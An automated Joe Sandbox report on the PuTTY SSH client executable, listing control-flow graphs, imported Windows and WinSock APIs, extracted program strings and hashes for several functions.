1626->1625 1629 7ff738a35870-7ff738a35897 MonitorFromWindow 1626->1629 1642 7ff738a35980-7ff738a359a3 1627->1642 1635 7ff738a35899-7ff738a358b3 1629->1635 1636 7ff738a358b5-7ff738a358bc 1629->1636 1638 7ff738a358be-7ff738a358c0 1635->1638 1636->1638 1638->1625 1640 7ff738a358c2-7ff738a358c9 1638->1640 1640->1625 1640->1627 1642->1642 1643 7ff738a359a5-7ff738a359d1 call 7ff738a40ee0 1642->1643 1646 7ff738a359ec-7ff738a35a05 call 7ff738a6d140 1643->1646 1647 7ff738a359d3-7ff738a359e7 call 7ff738afa0ec 1643->1647 1651 7ff738a35a07-7ff738a35a17 1646->1651 1652 7ff738a35a22-7ff738a35b9a call 7ff738a6d200 call 7ff738a5bc50 call 7ff738a49e00 call 7ff738a6d200 * 3 call 7ff738a418a0 GetWindowRect GetClientRect call 7ff738a6d200 GetWindowRect 1646->1652 1647->1646 1651->1652 1669 7ff738a35b9c-7ff738a35ba6 1652->1669 1670 7ff738a35be3-7ff738a35bfc GetDesktopWindow GetClientRect 1652->1670 1669->1670 1671 7ff738a35ba8-7ff738a35be1 GetMonitorInfoA 1669->1671 1672 7ff738a35bfe-7ff738a35c3c 1670->1672 1673 7ff738a35c40-7ff738a35e0d SetWindowPos call 7ff738a6f680 call 7ff738aeab50 CreateBitmap call 7ff738a6f720 CreateCaret SetScrollInfo GetDoubleClickTime GetSystemMenu CreatePopupMenu AppendMenuA * 4 CreateMenu call 7ff738a68690 1670->1673 1671->1672 1672->1673 1683 7ff738a35e10-7ff738a35e23 DeleteMenu 1673->1683 1683->1683 1684 7ff738a35e25-7ff738a35e2c 1683->1684 1685 7ff738a35e2e-7ff738a35e38 1684->1685 1686 7ff738a35e82-7ff738a35e9b AppendMenuA 1684->1686 1687 7ff738a35e40-7ff738a35e7b AppendMenuA 1685->1687 1688 7ff738a35ea1-7ff738a35eb4 1686->1688 1687->1687 1689 7ff738a35e7d-7ff738a35e80 1687->1689 1690 7ff738a35eff-7ff738a36037 AppendMenuA * 12 call 7ff738a6d200 AppendMenuA * 2 call 7ff738a3d720 1688->1690 1689->1686 1689->1688 1695 7ff738a3603d-7ff738a36052 AppendMenuA 1690->1695 1696 7ff738a35ec0-7ff738a35ef9 call 7ff738a6ea20 AppendMenuA call 7ff738a6f720 1690->1696 1695->1696 1696->1690 1701 7ff738a36057-7ff738a3605e call 7ff738a73d80 1696->1701 1704 7ff738a36071-7ff738a3611b call 7ff738a5bdf0 call 7ff738a36cf0 GetKeyboardLayout GetLocaleInfoA call 7ff738afb554 ShowWindow SetForegroundWindow GetForegroundWindow call 7ff738a49e10 UpdateWindow call 7ff738a3d480 1701->1704 1705 7ff738a36060-7ff738a36068 1701->1705 1716 7ff738a36122-7ff738a3612e call 7ff738a5c130 1704->1716 1705->1704 1719 7ff738a3616d-7ff738a36198 call 7ff738a5c5e0 MsgWaitForMultipleObjects 1716->1719 1720 7ff738a36130-7ff738a3614d PeekMessageA 1716->1720 1726 7ff738a3619a-7ff738a3619f call 7ff738a5c6b0 1719->1726 1727 7ff738a361a4-7ff738a361ac call 7ff738a5c720 1719->1727 1720->1719 1721 7ff738a3614f-7ff738a36168 GetForegroundWindow call 7ff738a49e10 1720->1721 1721->1719 1726->1727 1731 7ff738a361c7-7ff738a361df PeekMessageW 1727->1731 1732 7ff738a3611d call 7ff738a5c0d0 1731->1732 1733 7ff738a361e5-7ff738a361ed 1731->1733 1732->1716 1735 7ff738a361ef-7ff738a361ff call 7ff738a51dc0 IsWindow 1733->1735 1736 7ff738a36210-7ff738a3621f call 7ff738a36ef0 1733->1736 1741 7ff738a36201-7ff738a3620c IsDialogMessageA 1735->1741 1742 7ff738a361b0-7ff738a361b3 DispatchMessageW 1735->1742 1743 7ff738a361b6-7ff738a361c1 1741->1743 1744 7ff738a3620e 1741->1744 1742->1743 1743->1731 1743->1732 1744->1742
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Menu$Append$Window$Create$Rect$ClientInfoMessageMonitor$CapsDesktopDeviceFormat$ActiveBitmapCaretClickClipboardDeleteDialogDoubleErrorFromInitializeLastLongParamPopupRegisterReleaseScrollShowSystemTime
                                                          • String ID: %s Fatal Error$&About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$AdjustWindowRectExForDpi$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MSWHEEL_ROLLMSG$MonitorFromPoint$MonitorFromWindow$Ne&w Session...$PlaySoundA$PlaySoundW$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$ToUnicodeEx$Unable to create terminal window: %s$shcore.dll$term->mouse_select_clipboards[0] == CLIP_LOCAL$user32.dll$winmm.dll
                                                          • API String ID: 4040790088-3869385243
                                                          • Opcode ID: 8e22c9a735b0087f7fa0f1cf9938a339a5747c054baf8c72b16f9b8503ebbc09
                                                          • Instruction ID: d13d59ffa6fb6d130f789b7165ccd66427c38d2f58f6e07489e72e18588e6c0a
                                                          • Opcode Fuzzy Hash: 8e22c9a735b0087f7fa0f1cf9938a339a5747c054baf8c72b16f9b8503ebbc09
                                                          • Instruction Fuzzy Hash: 0282F232A09A42A6E754EB25E8107B9F3A1FF85B80F804231DE0D43B95DF7EE455E319
                                                          Function 00007FF738A6A030 Relevance: 142.1, APIs: 41, Strings: 40, Instructions: 328libraryloadernetworkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1745 7ff738a6a030-7ff738a6a051 call 7ff738a72b00 1748 7ff738a6a053-7ff738a6a069 call 7ff738a72b00 1745->1748 1749 7ff738a6a06f-7ff738a6a082 GetProcAddress 1745->1749 1748->1749 1758 7ff738a6a7a6-7ff738a6a7ad call 7ff738a362f0 1748->1758 1751 7ff738a6a0ce-7ff738a6a0e4 call 7ff738a72b00 1749->1751 1752 7ff738a6a084-7ff738a6a08e 1749->1752 1764 7ff738a6a157-7ff738a6a161 1751->1764 1765 7ff738a6a0e6-7ff738a6a107 GetProcAddress 1751->1765 1754 7ff738a6a138 1752->1754 1755 7ff738a6a094-7ff738a6a0b2 GetProcAddress 1752->1755 1757 7ff738a6a143 1754->1757 1755->1757 1759 7ff738a6a0b8-7ff738a6a0cc GetProcAddress 1755->1759 1762 7ff738a6a14e 1757->1762 1767 7ff738a6a7b2-7ff738a6a7cd call 7ff738a362f0 1758->1767 1763 7ff738a6a11d-7ff738a6a127 1759->1763 1768 7ff738a6a150 1762->1768 1763->1762 1766 7ff738a6a129-7ff738a6a136 GetProcAddress 1763->1766 1769 7ff738a6a163-7ff738a6a170 GetProcAddress 1764->1769 1770 7ff738a6a172 1764->1770 1765->1757 1771 7ff738a6a109-7ff738a6a116 GetProcAddress 1765->1771 1766->1768 1777 7ff738a6a7e6 1767->1777 1778 7ff738a6a7cf-7ff738a6a7d4 1767->1778 1768->1764 1773 7ff738a6a174-7ff738a6a185 1769->1773 1770->1773 1771->1763 1775 7ff738a6a18b-7ff738a6a1a9 GetProcAddress 1773->1775 1776 7ff738a6a5d5 1773->1776 1779 7ff738a6a5e0 1775->1779 1780 7ff738a6a1af-7ff738a6a1cd GetProcAddress 1775->1780 1776->1779 1778->1777 1781 7ff738a6a7d6-7ff738a6a7de 1778->1781 1782 7ff738a6a5eb 1779->1782 1780->1782 1783 7ff738a6a1d3-7ff738a6a1f1 GetProcAddress 1780->1783 1781->1777 1784 7ff738a6a7e0-7ff738a6a7e3 1781->1784 1785 7ff738a6a5f6 1782->1785 1783->1785 1786 7ff738a6a1f7-7ff738a6a215 GetProcAddress 1783->1786 1784->1777 1787 7ff738a6a601 1785->1787 1786->1787 1788 7ff738a6a21b-7ff738a6a239 GetProcAddress 1786->1788 1789 7ff738a6a60c 1787->1789 1788->1789 1790 7ff738a6a23f-7ff738a6a25d GetProcAddress 1788->1790 1791 7ff738a6a617 1789->1791 1790->1791 1792 7ff738a6a263-7ff738a6a281 GetProcAddress 1790->1792 1794 7ff738a6a622 1791->1794 1793 7ff738a6a287-7ff738a6a2a5 GetProcAddress 1792->1793 1792->1794 1795 7ff738a6a62d 1793->1795 1796 7ff738a6a2ab-7ff738a6a2c9 GetProcAddress 1793->1796 1794->1795 1797 7ff738a6a638 1795->1797 1796->1797 1798 7ff738a6a2cf-7ff738a6a2ed GetProcAddress 1796->1798 1799 7ff738a6a643 1797->1799 1798->1799 1800 7ff738a6a2f3-7ff738a6a311 GetProcAddress 1798->1800 1801 7ff738a6a64e 1799->1801 1800->1801 1802 7ff738a6a317-7ff738a6a335 GetProcAddress 1800->1802 1803 7ff738a6a659 1801->1803 1802->1803 1804 7ff738a6a33b-7ff738a6a359 GetProcAddress 1802->1804 1805 7ff738a6a664 1803->1805 1804->1805 1806 7ff738a6a35f-7ff738a6a37d GetProcAddress 1804->1806 1807 7ff738a6a66f 1805->1807 1806->1807 1808 7ff738a6a383-7ff738a6a3a1 GetProcAddress 1806->1808 1809 7ff738a6a67a 1807->1809 1808->1809 1810 7ff738a6a3a7-7ff738a6a3c5 GetProcAddress 1808->1810 1811 7ff738a6a685 1809->1811 1810->1811 1812 7ff738a6a3cb-7ff738a6a3e9 GetProcAddress 1810->1812 1813 7ff738a6a690 1811->1813 1812->1813 1814 7ff738a6a3ef-7ff738a6a40d GetProcAddress 1812->1814 1815 7ff738a6a69b 1813->1815 1814->1815 1816 7ff738a6a413-7ff738a6a431 GetProcAddress 1814->1816 1817 7ff738a6a6a6 1815->1817 1816->1817 1818 7ff738a6a437-7ff738a6a455 GetProcAddress 1816->1818 1819 7ff738a6a6b1 1817->1819 1818->1819 1820 7ff738a6a45b-7ff738a6a479 GetProcAddress 1818->1820 1821 7ff738a6a6bc 1819->1821 1820->1821 1822 7ff738a6a47f-7ff738a6a49d GetProcAddress 1820->1822 1823 7ff738a6a6c7 1821->1823 1822->1823 1824 7ff738a6a4a3-7ff738a6a4c1 GetProcAddress 1822->1824 1826 7ff738a6a6d2 1823->1826 1825 7ff738a6a4c7-7ff738a6a4e5 GetProcAddress 1824->1825 1824->1826 1827 7ff738a6a6dd 1825->1827 1828 7ff738a6a4eb-7ff738a6a509 GetProcAddress 1825->1828 1826->1827 1829 7ff738a6a6e8 1827->1829 1828->1829 1830 7ff738a6a50f-7ff738a6a52d GetProcAddress 1828->1830 1831 7ff738a6a6f3 1829->1831 1830->1831 1832 7ff738a6a533-7ff738a6a551 GetProcAddress 1830->1832 1833 7ff738a6a6fe 1831->1833 1832->1833 1834 7ff738a6a557-7ff738a6a575 GetProcAddress 1832->1834 1835 7ff738a6a709 1833->1835 1834->1835 1836 7ff738a6a57b-7ff738a6a599 GetProcAddress 1834->1836 1837 7ff738a6a714 1835->1837 1836->1837 1838 7ff738a6a59f-7ff738a6a5bd GetProcAddress 1836->1838 1839 7ff738a6a71f 1837->1839 1838->1839 1840 7ff738a6a5c3-7ff738a6a5d0 GetProcAddress 1838->1840 1841 7ff738a6a721-7ff738a6a73b WSAStartup 1839->1841 1840->1841 1842 7ff738a6a73d-7ff738a6a748 1841->1842 1843 7ff738a6a74a-7ff738a6a75d WSAStartup 1841->1843 1842->1843 1844 7ff738a6a78e-7ff738a6a7a5 call 7ff738a70bc0 1842->1844 1845 7ff738a6a76c-7ff738a6a77f WSAStartup 1843->1845 1846 7ff738a6a75f-7ff738a6a76a 1843->1846 1845->1767 1847 7ff738a6a781-7ff738a6a78c 1845->1847 1846->1844 1846->1845 1847->1767 1847->1844
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Startup$LibraryLoad
                                                          • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$getsockname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
                                                          • API String ID: 1450042416-2366807250
                                                          • Opcode ID: 93f9ef0fcb9e3cbeadd62765476b580965984e81a97872986af182b56776c462
                                                          • Instruction ID: d281cc52e4cbbd8fadf6bab67464970412b310631d46d597ce2ff8ed2624e866
                                                          • Opcode Fuzzy Hash: 93f9ef0fcb9e3cbeadd62765476b580965984e81a97872986af182b56776c462
                                                          • Instruction Fuzzy Hash: 052288A6A0AB03A0FE45FB14E864778E3A0BF44750FD04635C44D46668EF7FB944A63E
                                                          Function 00007FF738A52220 Relevance: 60.0, APIs: 26, Strings: 8, Instructions: 508windowtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1850 7ff738a52220-7ff738a52259 1851 7ff738a526a9-7ff738a526b2 1850->1851 1852 7ff738a5225f-7ff738a52268 1850->1852 1853 7ff738a52a0e-7ff738a52a1e call 7ff738ae9230 1851->1853 1854 7ff738a526b8-7ff738a526c0 1851->1854 1855 7ff738a5226e-7ff738a52275 1852->1855 1856 7ff738a527ef-7ff738a527f6 1852->1856 1868 7ff738a52a20-7ff738a52a33 1853->1868 1854->1853 1859 7ff738a526c6-7ff738a526cd 1854->1859 1860 7ff738a5227b-7ff738a522d1 call 7ff738a53fa0 call 7ff738a546a0 call 7ff738a828a0 1855->1860 1861 7ff738a5285f-7ff738a52885 call 7ff738a54020 call 7ff738ae9230 1855->1861 1856->1853 1858 7ff738a527fc-7ff738a52804 1856->1858 1858->1853 1863 7ff738a5280a-7ff738a5282a KillTimer call 7ff738a73280 1858->1863 1859->1853 1865 7ff738a526d3-7ff738a52754 SendMessageA * 3 call 7ff738a55b80 1859->1865 1893 7ff738a5232c-7ff738a524f3 LoadIconA SendMessageA call 7ff738a83c00 MapDialogRect CreateWindowExA SendMessageA * 2 MapDialogRect CreateWindowExA SendMessageA * 2 1860->1893 1894 7ff738a522d3-7ff738a522ec 1860->1894 1861->1868 1879 7ff738a5282c-7ff738a5284b MessageBoxA call 7ff738a6f720 1863->1879 1880 7ff738a52850-7ff738a5285a call 7ff738a825c0 1863->1880 1876 7ff738a5275a-7ff738a5276f 1865->1876 1877 7ff738a52a34-7ff738a52a83 call 7ff738a546a0 call 7ff738a828a0 1865->1877 1882 7ff738a527c5-7ff738a527c9 1876->1882 1905 7ff738a52ad8-7ff738a52b13 call 7ff738a59f60 SendMessageA InvalidateRect SetFocus 1877->1905 1906 7ff738a52a85-7ff738a52a97 1877->1906 1879->1880 1880->1853 1890 7ff738a527cb-7ff738a527cd 1882->1890 1891 7ff738a52780-7ff738a527bf call 7ff738a55950 call 7ff738a55af0 call 7ff738a6f720 * 2 call 7ff738a55b80 1882->1891 1896 7ff738a527d8-7ff738a527e5 GetDlgItem 1890->1896 1891->1877 1891->1882 1912 7ff738a524f9-7ff738a52517 1893->1912 1913 7ff738a528c1-7ff738a528d2 SendMessageA 1893->1913 1900 7ff738a522f0-7ff738a52313 call 7ff738a55b90 1894->1900 1897 7ff738a527e7-7ff738a527ed DestroyWindow 1896->1897 1898 7ff738a527d0-7ff738a527d6 1896->1898 1897->1898 1898->1891 1898->1896 1910 7ff738a52318-7ff738a5232a call 7ff738a828a0 1900->1910 1905->1853 1911 7ff738a52aa0-7ff738a52ad6 call 7ff738a55b90 call 7ff738a828a0 1906->1911 1910->1893 1910->1900 1911->1905 1919 7ff738a52572-7ff738a52580 1912->1919 1915 7ff738a528d8-7ff738a528f1 call 7ff738afa0ec 1913->1915 1932 7ff738a528f3-7ff738a52936 call 7ff738a546a0 call 7ff738a828a0 1915->1932 1921 7ff738a5255a-7ff738a5256c 1919->1921 1922 7ff738a52582-7ff738a52585 1919->1922 1921->1919 1926 7ff738a5288a-7ff738a528bd SendMessageA 1921->1926 1928 7ff738a52587-7ff738a52594 call 7ff738a82650 1922->1928 1929 7ff738a525a0 1922->1929 1926->1932 1933 7ff738a528bf 1926->1933 1928->1921 1943 7ff738a52596-7ff738a5259b 1928->1943 1936 7ff738a525a2-7ff738a525b3 call 7ff738a82620 1929->1936 1953 7ff738a52988-7ff738a5299a call 7ff738a59f60 1932->1953 1954 7ff738a52938-7ff738a5294a 1932->1954 1933->1915 1947 7ff738a525ce-7ff738a525eb call 7ff738aeaf58 1936->1947 1948 7ff738a525b5-7ff738a525c9 call 7ff738afa0ec 1936->1948 1943->1936 1956 7ff738a525ed-7ff738a525f8 1947->1956 1957 7ff738a525fa 1947->1957 1948->1947 1962 7ff738a5299c-7ff738a529ad SetTimer 1953->1962 1963 7ff738a529b3-7ff738a529c4 call 7ff738a55b80 1953->1963 1958 7ff738a52950-7ff738a5296f call 7ff738a55b90 1954->1958 1960 7ff738a52601-7ff738a52669 call 7ff738afefa0 SendMessageA 1956->1960 1957->1960 1965 7ff738a52974-7ff738a52986 call 7ff738a828a0 1958->1965 1971 7ff738a52519 1960->1971 1972 7ff738a5266f-7ff738a5269e SendMessageA 1960->1972 1962->1963 1974 7ff738a529f8-7ff738a52a07 ShowWindow 1963->1974 1975 7ff738a529c6-7ff738a529cb 1963->1975 1965->1953 1965->1958 1973 7ff738a52521-7ff738a5253d call 7ff738aeab50 1971->1973 1972->1973 1976 7ff738a526a4 1972->1976 1979 7ff738a52542-7ff738a52556 1973->1979 1974->1853 1978 7ff738a529d0-7ff738a529d6 1975->1978 1976->1979 1980 7ff738a529d8-7ff738a529ec call 7ff738a55b80 1978->1980 1981 7ff738a529f0-7ff738a529f3 call 7ff738a59e30 1978->1981 1979->1921 1980->1978 1985 7ff738a529ee 1980->1985 1981->1974 1985->1974
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$Window$Rect$Dialog$CreateTimer$ClientDestroyFocusIconInvalidateItemKillLoadLongShowText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$firstpath$j == ctrl_path_elements(s->pathname) - 1
                                                          • API String ID: 443372750-2014718063
                                                          • Opcode ID: 26a8d7d2dd6c0980407e8ea79a2d1d785de7e4f7d815cc237f4b59a289379c27
                                                          • Instruction ID: 11c9eddb2d9252bc8a4b2838d5845e7ade69493cdfef0c0cffc07fc8df8734c2
                                                          • Opcode Fuzzy Hash: 26a8d7d2dd6c0980407e8ea79a2d1d785de7e4f7d815cc237f4b59a289379c27
                                                          • Instruction Fuzzy Hash: C932C773B09A8295EB20AB25E410BBAF350FB84B84F844235DE8D47B95DF3EE445E714
                                                          Function 00007FF738A3CF20 Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 308COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1986 7ff738a3cf20-7ff738a3cf72 call 7ff738ae91d0 call 7ff738a66740 call 7ff738a667b0 call 7ff738a66750 1995 7ff738a3cf7f-7ff738a3cfb1 call 7ff738a6db90 call 7ff738a67360 call 7ff738a36fe0 call 7ff738a37050 1986->1995 1996 7ff738a3cf74-7ff738a3cf7a call 7ff738a66750 1986->1996 2006 7ff738a3cfda-7ff738a3cfe9 call 7ff738a37100 1995->2006 2007 7ff738a3cfb3-7ff738a3cfbf call 7ff738a6e760 1995->2007 1996->1995 2012 7ff738a3d2b9-7ff738a3d2c9 call 7ff738a66630 2006->2012 2014 7ff738a3cfef-7ff738a3cff2 2006->2014 2007->2012 2013 7ff738a3cfc5-7ff738a3cfcf call 7ff738a52010 2007->2013 2022 7ff738a3d2cb-7ff738a3d2f9 call 7ff738a673b0 call 7ff738a6de80 call 7ff738a6db90 2012->2022 2023 7ff738a3d30f-7ff738a3d311 2012->2023 2013->2012 2024 7ff738a3cfd5 2013->2024 2017 7ff738a3cff8-7ff738a3d009 call 7ff738a723f0 2014->2017 2018 7ff738a3d2b7 2014->2018 2030 7ff738a3d2fb-7ff738a3d2fe call 7ff738a66630 2017->2030 2031 7ff738a3d00f-7ff738a3d025 2017->2031 2018->2012 2026 7ff738a3d32f-7ff738a3d35b call 7ff738a6fb50 call 7ff738ae9230 2022->2026 2023->2026 2027 7ff738a3d313-7ff738a3d31d call 7ff738a666e0 2023->2027 2029 7ff738a3d3e4-7ff738a3d3eb call 7ff738a36ef0 2024->2029 2027->2026 2044 7ff738a3d31f-7ff738a3d322 call 7ff738a52010 2027->2044 2043 7ff738a3d303-7ff738a3d30d 2030->2043 2032 7ff738a3d052-7ff738a3d079 call 7ff738a72670 call 7ff738a649b0 2031->2032 2055 7ff738a3d160 2032->2055 2056 7ff738a3d07f-7ff738a3d087 2032->2056 2043->2022 2043->2023 2052 7ff738a3d327-7ff738a3d329 2044->2052 2052->2026 2052->2029 2057 7ff738a3d164-7ff738a3d167 2055->2057 2058 7ff738a3d089-7ff738a3d08c 2056->2058 2059 7ff738a3d03f-7ff738a3d04c 2056->2059 2061 7ff738a3d08e-7ff738a3d09f call 7ff738afe580 2058->2061 2062 7ff738a3d030 2058->2062 2059->2032 2060 7ff738a3d277-7ff738a3d284 call 7ff738a66630 2059->2060 2060->2043 2069 7ff738a3d286-7ff738a3d2b2 call 7ff738a673b0 call 7ff738a6de80 call 7ff738a52010 call 7ff738a36ef0 2060->2069 2070 7ff738a3d36a-7ff738a3d3b8 call 7ff738a6ea20 * 2 call 7ff738a72b50 2061->2070 2071 7ff738a3d0a5-7ff738a3d0b6 call 7ff738afe580 2061->2071 2063 7ff738a3d037-7ff738a3d03a call 7ff738a37260 2062->2063 2063->2059 2069->2018 2102 7ff738a3d3ba call 7ff738a69e00 2070->2102 2103 7ff738a3d3bf-7ff738a3d3d1 call 7ff738a6f720 * 2 call 7ff738af6ac4 2070->2103 2078 7ff738a3d0bc-7ff738a3d0c3 2071->2078 2079 7ff738a3d3d6-7ff738a3d3df call 7ff738a72cb0 call 7ff738af6ac4 2071->2079 2082 7ff738a3d121-7ff738a3d12e call 7ff738afe580 2078->2082 2083 7ff738a3d0c5-7ff738a3d0d6 call 7ff738afe580 2078->2083 2079->2029 2098 7ff738a3d16c-7ff738a3d177 2082->2098 2099 7ff738a3d130-7ff738a3d141 call 7ff738afe580 2082->2099 2100 7ff738a3d35c-7ff738a3d365 call 7ff738a53c00 call 7ff738af6ac4 2083->2100 2101 7ff738a3d0dc-7ff738a3d0ed call 7ff738afe580 2083->2101 2107 7ff738a3d25a-7ff738a3d261 2098->2107 2108 7ff738a3d17d-7ff738a3d194 call 7ff738a72690 2098->2108 2116 7ff738a3d196-7ff738a3d1a1 2099->2116 2117 7ff738a3d143-7ff738a3d147 2099->2117 2100->2070 2101->2100 2118 7ff738a3d0f3-7ff738a3d104 call 7ff738afe580 2101->2118 2102->2103 2103->2079 2107->2063 2108->2057 2126 7ff738a3d1a7-7ff738a3d1ad 2116->2126 2127 7ff738a3d24e-7ff738a3d255 2116->2127 2122 7ff738a3d14d-7ff738a3d154 2117->2122 2123 7ff738a3d242-7ff738a3d249 2117->2123 2118->2100 2131 7ff738a3d10a-7ff738a3d11b call 7ff738afe580 2118->2131 2122->2063 2123->2063 2126->2127 2130 7ff738a3d1b3-7ff738a3d1e4 call 7ff738a72670 call 7ff738a72690 call 7ff738afa8f0 2126->2130 2127->2063 2140 7ff738a3d1e6-7ff738a3d1f0 call 7ff738a37260 2130->2140 2141 7ff738a3d1f5-7ff738a3d20b call 7ff738a6fd50 2130->2141 2131->2082 2131->2100 2140->2141 2145 7ff738a3d210-7ff738a3d228 call 7ff738afcc08 2141->2145 2148 7ff738a3d22a-7ff738a3d240 call 7ff738a6ec10 2145->2148 2149 7ff738a3d266-7ff738a3d272 call 7ff738afc348 2145->2149 2148->2145 2149->2057
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: FileView$CloseCommandHandleLineUnmap
                                                          • String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$-$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
                                                          • API String ID: 2122081399-1841002763
                                                          • Opcode ID: 92fe8418ad11dffc96ac489ca1a48aa20ec0e8965734d313fe82a7d3d640208b
                                                          • Instruction ID: dba7272dcf8e7b4979c855b67e9c0aec200df63927976c2b4b2d02dab84bc552
                                                          • Opcode Fuzzy Hash: 92fe8418ad11dffc96ac489ca1a48aa20ec0e8965734d313fe82a7d3d640208b
                                                          • Instruction Fuzzy Hash: B7C19F62A0E643A1FA54BB22D811BB9D2415F41BC0FC44436ED0E477D6EEBFE505A229
                                                          Function 00007FF738A563C0 Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 417COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
